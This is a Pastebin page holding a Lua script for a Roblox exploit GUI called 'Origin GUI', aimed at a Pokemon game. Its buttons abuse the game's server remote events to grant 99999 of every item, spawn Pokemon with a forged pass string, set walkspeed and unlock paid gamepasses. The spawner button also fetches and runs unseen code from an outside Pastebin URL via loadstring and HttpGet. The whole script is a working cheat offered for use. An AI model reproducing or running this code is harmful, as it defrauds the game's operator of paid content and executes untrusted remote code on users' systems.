Advertisement
Guest User

Origin GUI ( Roblox Exploit GUI )

a guest
Nov 22nd, 2019
5,792
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.17 KB | None | 0 0
  1. --Origin GUI [Alpha]
  2. -- Made By Zevisu#9228
  3.  
  4. local ScreenGui = Instance.new("ScreenGui")
  5. local LoginFrame = Instance.new("Frame")
  6. local bar1 = Instance.new("Frame")
  7. local ltitle = Instance.new("TextLabel")
  8. local info = Instance.new("TextLabel")
  9. local login = Instance.new("TextButton")
  10. local MainFrame = Instance.new("Frame")
  11. local mbar1 = Instance.new("Frame")
  12. local mtitle = Instance.new("TextLabel")
  13. local mclose = Instance.new("TextButton")
  14. local credits = Instance.new("TextLabel")
  15. local scrbut = Instance.new("TextButton")
  16. local ScriptFrame = Instance.new("Frame")
  17. local sbar1 = Instance.new("Frame")
  18. local sclose = Instance.new("TextButton")
  19. local speed = Instance.new("TextButton")
  20. local items = Instance.new("TextButton")
  21. local spawner = Instance.new("TextButton")
  22. local gamepass = Instance.new("TextButton")
  23.  
  24. --Properties:
  25.  
  26. ScreenGui.Parent = game.CoreGui
  27.  
  28. LoginFrame.Name = "LoginFrame"
  29. LoginFrame.Parent = ScreenGui
  30. LoginFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  31. LoginFrame.BorderColor3 = Color3.new(0, 0, 0)
  32. LoginFrame.BorderSizePixel = 3
  33. LoginFrame.Position = UDim2.new(0.0366336703, 0, 0.128721684, 0)
  34. LoginFrame.Size = UDim2.new(0, 275, 0, 242)
  35.  
  36. bar1.Name = "bar1"
  37. bar1.Parent = LoginFrame
  38. bar1.BackgroundColor3 = Color3.new(0, 0, 0)
  39. bar1.BorderColor3 = Color3.new(0.105882, 0.105882, 0.105882)
  40. bar1.Position = UDim2.new(-0.00256302953, 0, -0.0022534444, 0)
  41. bar1.Size = UDim2.new(0, 275, 0, 25)
  42.  
  43. ltitle.Name = "ltitle"
  44. ltitle.Parent = bar1
  45. ltitle.BackgroundColor3 = Color3.new(1, 1, 1)
  46. ltitle.BackgroundTransparency = 1
  47. ltitle.Position = UDim2.new(0.131834716, 0, 0.069648236, 0)
  48. ltitle.Size = UDim2.new(0, 200, 0, 23)
  49. ltitle.Font = Enum.Font.GothamBlack
  50. ltitle.Text = "Origin GUI "
  51. ltitle.TextColor3 = Color3.new(1, 1, 1)
  52. ltitle.TextScaled = true
  53. ltitle.TextSize = 14
  54. ltitle.TextWrapped = true
  55.  
  56. info.Name = "info"
  57. info.Parent = bar1
  58. info.BackgroundColor3 = Color3.new(1, 1, 1)
  59. info.BackgroundTransparency = 1
  60. info.Position = UDim2.new(0.130909085, 0, 2.55999994, 0)
  61. info.Size = UDim2.new(0, 200, 0, 102)
  62. info.Font = Enum.Font.GothamBlack
  63. info.Text = "Origin GUI, this is a gui with a script hub containing project pokemon scripts, and a soon to be executor, enjoy!"
  64. info.TextColor3 = Color3.new(1, 1, 1)
  65. info.TextScaled = true
  66. info.TextSize = 14
  67. info.TextWrapped = true
  68.  
  69. login.Name = "login"
  70. login.Parent = LoginFrame
  71. login.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  72. login.BorderColor3 = Color3.new(0, 0, 0)
  73. login.BorderSizePixel = 3
  74. login.Position = UDim2.new(0.352727264, 0, 0.822314024, 0)
  75. login.Size = UDim2.new(0, 79, 0, 34)
  76. login.Font = Enum.Font.GothamBlack
  77. login.Text = "Login"
  78. login.TextColor3 = Color3.new(1, 1, 1)
  79. login.TextScaled = true
  80. login.TextSize = 14
  81. login.TextWrapped = true
  82. login.MouseButton1Down:connect(function()
  83. LoginFrame.Visible = false
  84. MainFrame.Visible = true
  85. end)
  86.  
  87. MainFrame.Name = "MainFrame"
  88. MainFrame.Parent = ScreenGui
  89. MainFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  90. MainFrame.BorderColor3 = Color3.new(0, 0, 0)
  91. MainFrame.BorderSizePixel = 3
  92. MainFrame.Position = UDim2.new(0.0277227759, 0, 0.430062622, 0)
  93. MainFrame.Size = UDim2.new(0, 321, 0, 264)
  94. MainFrame.Visible = false
  95.  
  96. mbar1.Name = "mbar1"
  97. mbar1.Parent = MainFrame
  98. mbar1.BackgroundColor3 = Color3.new(0, 0, 0)
  99. mbar1.BorderColor3 = Color3.new(0.105882, 0.105882, 0.105882)
  100. mbar1.Position = UDim2.new(-0.00256309635, 0, -0.0022534458, 0)
  101. mbar1.Size = UDim2.new(0, 321, 0, 25)
  102.  
  103. mtitle.Name = "mtitle"
  104. mtitle.Parent = mbar1
  105. mtitle.BackgroundColor3 = Color3.new(1, 1, 1)
  106. mtitle.BackgroundTransparency = 1
  107. mtitle.Position = UDim2.new(0.185566559, 0, 0.171199888, 0)
  108. mtitle.Size = UDim2.new(0, 200, 0, 14)
  109. mtitle.Font = Enum.Font.GothamBlack
  110. mtitle.Text = "Origin GUI"
  111. mtitle.TextColor3 = Color3.new(1, 1, 1)
  112. mtitle.TextSize = 20
  113. mtitle.TextWrapped = true
  114.  
  115. mclose.Name = "mclose"
  116. mclose.Parent = MainFrame
  117. mclose.BackgroundColor3 = Color3.new(1, 1, 1)
  118. mclose.BackgroundTransparency = 1
  119. mclose.Position = UDim2.new(0.919003129, 0, -0.0113636255, 0)
  120. mclose.Size = UDim2.new(0, 26, 0, 29)
  121. mclose.Font = Enum.Font.GothamBlack
  122. mclose.Text = "X"
  123. mclose.TextColor3 = Color3.new(1, 1, 1)
  124. mclose.TextScaled = true
  125. mclose.TextSize = 14
  126. mclose.TextWrapped = true
  127. mclose.MouseButton1Down:connect(function()
  128. MainFrame:Destroy()
  129. end)
  130.  
  131. credits.Name = "credits"
  132. credits.Parent = MainFrame
  133. credits.BackgroundColor3 = Color3.new(1, 1, 1)
  134. credits.BackgroundTransparency = 1
  135. credits.Position = UDim2.new(0.0280373823, 0, 0.919157922, 0)
  136. credits.Size = UDim2.new(0, 143, 0, 21)
  137. credits.Font = Enum.Font.GothamBlack
  138. credits.Text = "GUI Made By Zevisu #9228"
  139. credits.TextColor3 = Color3.new(1, 1, 1)
  140. credits.TextScaled = true
  141. credits.TextSize = 14
  142. credits.TextWrapped = true
  143.  
  144. scrbut.Name = "scrbut"
  145. scrbut.Parent = MainFrame
  146. scrbut.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  147. scrbut.BorderColor3 = Color3.new(0, 0, 0)
  148. scrbut.BorderSizePixel = 3
  149. scrbut.Position = UDim2.new(0.517133951, 0, 0.693181813, 0)
  150. scrbut.Size = UDim2.new(0, 129, 0, 50)
  151. scrbut.Font = Enum.Font.GothamBlack
  152. scrbut.Text = "Scripts"
  153. scrbut.TextColor3 = Color3.new(1, 1, 1)
  154. scrbut.TextSize = 30
  155. scrbut.TextWrapped = true
  156. scrbut.MouseButton1Down:connect(function()
  157. MainFrame.Visible = false
  158. ScriptFrame.Visible = true
  159. end)
  160.  
  161. ScriptFrame.Name = "ScriptFrame"
  162. ScriptFrame.Parent = ScreenGui
  163. ScriptFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  164. ScriptFrame.BorderColor3 = Color3.new(0, 0, 0)
  165. ScriptFrame.BorderSizePixel = 3
  166. ScriptFrame.Position = UDim2.new(0.600990117, 0, 0.127348647, 0)
  167. ScriptFrame.Size = UDim2.new(0, 294, 0, 269)
  168. ScriptFrame.Visible = false
  169.  
  170. sbar1.Name = "sbar1"
  171. sbar1.Parent = ScriptFrame
  172. sbar1.BackgroundColor3 = Color3.new(0, 0, 0)
  173. sbar1.BorderColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  174. sbar1.BorderSizePixel = 3
  175. sbar1.Size = UDim2.new(0, 294, 0, 24)
  176.  
  177. sclose.Name = "sclose"
  178. sclose.Parent = sbar1
  179. sclose.BackgroundColor3 = Color3.new(1, 1, 1)
  180. sclose.BackgroundTransparency = 1
  181. sclose.Position = UDim2.new(0.911564648, 0, 0, 0)
  182. sclose.Size = UDim2.new(0, 32, 0, 24)
  183. sclose.Font = Enum.Font.GothamBlack
  184. sclose.Text = "X"
  185. sclose.TextColor3 = Color3.new(1, 1, 1)
  186. sclose.TextScaled = true
  187. sclose.TextSize = 14
  188. sclose.TextWrapped = true
  189. sclose.MouseButton1Down:connect(function()
  190. ScriptFrame:Destroy()
  191. end)
  192.  
  193. speed.Name = "speed"
  194. speed.Parent = ScriptFrame
  195. speed.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  196. speed.BorderColor3 = Color3.new(0, 0, 0)
  197. speed.BorderSizePixel = 3
  198. speed.Position = UDim2.new(0.183673471, 0, 0.148698881, 0)
  199. speed.Size = UDim2.new(0, 200, 0, 45)
  200. speed.Font = Enum.Font.GothamBlack
  201. speed.Text = "Faster Walkspeed"
  202. speed.TextColor3 = Color3.new(1, 1, 1)
  203. speed.TextScaled = true
  204. speed.TextSize = 14
  205. speed.TextWrapped = true
  206. speed.MouseButton1Down:connect(function()
  207. game.Workspace.Zevisu.Humanoid.WalkSpeed = 100
  208. end)
  209.  
  210. items.Name = "items"
  211. items.Parent = ScriptFrame
  212. items.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  213. items.BorderColor3 = Color3.new(0, 0, 0)
  214. items.BorderSizePixel = 3
  215. items.Position = UDim2.new(0.183673471, 0, 0.352983624, 0)
  216. items.Size = UDim2.new(0, 200, 0, 45)
  217. items.Font = Enum.Font.GothamBlack
  218. items.Text = "Alot Of Every Item"
  219. items.TextColor3 = Color3.new(1, 1, 1)
  220. items.TextScaled = true
  221. items.TextSize = 14
  222. items.TextWrapped = true
  223. items.MouseButton1Down:connect(function()
  224. Amount = 99999
  225. b=game.Players.LocalPlayer.Bag
  226. r=game.ReplicatedStorage.REvents
  227. Items = {
  228. Recover = {"Antidote","Awakening","Burn Heal","Full Restore","Hyper Potion","Ice Heal","Max Elixir","Potion","Paralyze Heal","Revive"},
  229. Pokeball = {"Great Ball","Nest Ball","Net Ball","Pokeball","Premier Ball","Repeat Ball","Ultra Ball","Master Ball"},
  230. Evolution = {"Rare Candy","Common Candy","Dragon Scale","Fire Stone","Friendship Ribbon","Leaf Stone","Link Cable Stone","Metal Coat","Moon Stone","Sinnoh Stone","Thunder Stone","Water Stone"},
  231. Competitive = {"Calcium","Carbos","HP Up","Iron","Mini Stat Reset","Nature Stone","PokeImprove","Protein","Stat Reset","Zinc"}
  232. }
  233. for n,t in next,Items do
  234. for _,i in next,t do
  235. if b[n]:FindFirstChild(i)then
  236. r.Internal.funcItem:InvokeServer(b[n][i],Amount)
  237. else r.Pokemon.ozAxZ:InvokeServer(i,b[n],Amount)
  238. end end end
  239. end)
  240.  
  241.  
  242. spawner.Name = "spawner"
  243. spawner.Parent = ScriptFrame
  244. spawner.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  245. spawner.BorderColor3 = Color3.new(0, 0, 0)
  246. spawner.BorderSizePixel = 3
  247. spawner.Position = UDim2.new(0.183673471, 0, 0.567315042, 0)
  248. spawner.Size = UDim2.new(0, 200, 0, 45)
  249. spawner.Font = Enum.Font.GothamBlack
  250. spawner.Text = "Pokemon Spawner :D"
  251. spawner.TextColor3 = Color3.new(1, 1, 1)
  252. spawner.TextScaled = true
  253. spawner.TextSize = 14
  254. spawner.TextWrapped = true
  255. spawner.MouseButton1Down:connect(function()
  256. _G.PlayingCheckers = function(pokemon, party, level, leavethistrueiguess)
  257. local Encrypt = function(CodeSource)
  258. local StringCode = '';
  259. for i = 1, #CodeSource do
  260. StringCode = StringCode ..string.char(48)..string.byte(string.sub(CodeSource,i,i));
  261. end
  262. return StringCode;
  263. end
  264.  
  265. local pass = Encrypt(game.Players.LocalPlayer.Name..level..pokemon)
  266.  
  267. game.ReplicatedStorage.REvents.Pokemon.iwillknowXD:InvokeServer(pokemon, party, level, leavethistrueiguess, leavethistrueiguess, pass)
  268. end
  269. wait(.4)
  270. loadstring(game:HttpGet("https://pastebin.com/raw/8qrgSuaU", true))()
  271. end)
  272.  
  273. gamepass.Name = "gamepass"
  274. gamepass.Parent = ScriptFrame
  275. gamepass.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
  276. gamepass.BorderColor3 = Color3.new(0, 0, 0)
  277. gamepass.BorderSizePixel = 3
  278. gamepass.Position = UDim2.new(0.183673471, 0, 0.758204103, 0)
  279. gamepass.Size = UDim2.new(0, 200, 0, 45)
  280. gamepass.Font = Enum.Font.GothamBlack
  281. gamepass.Text = "Every Gamepass"
  282. gamepass.TextColor3 = Color3.new(1, 1, 1)
  283. gamepass.TextScaled = true
  284. gamepass.TextSize = 14
  285. gamepass.TextWrapped = true
  286. gamepass.MouseButton1Down:connect(function()
  287. local plr = game.Players.LocalPlayer
  288. plr.MewVIP.Value = 1
  289. plr.OtherLegendary.Value = 1
  290. plr.EeveeVIP.Value = 1
  291. plr.RunVIP.Value = 1
  292. plr.JohtoVIP.Value = 1
  293. plr.KantoStarterVIP.Value = 1
  294. plr.LegendaryVIP.Value = 1
  295. plr.ShinyVIP.Value = 1
  296. plr.MoonVIP.Value = 1
  297. plr.MoreneyVIP.Value = 1
  298. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement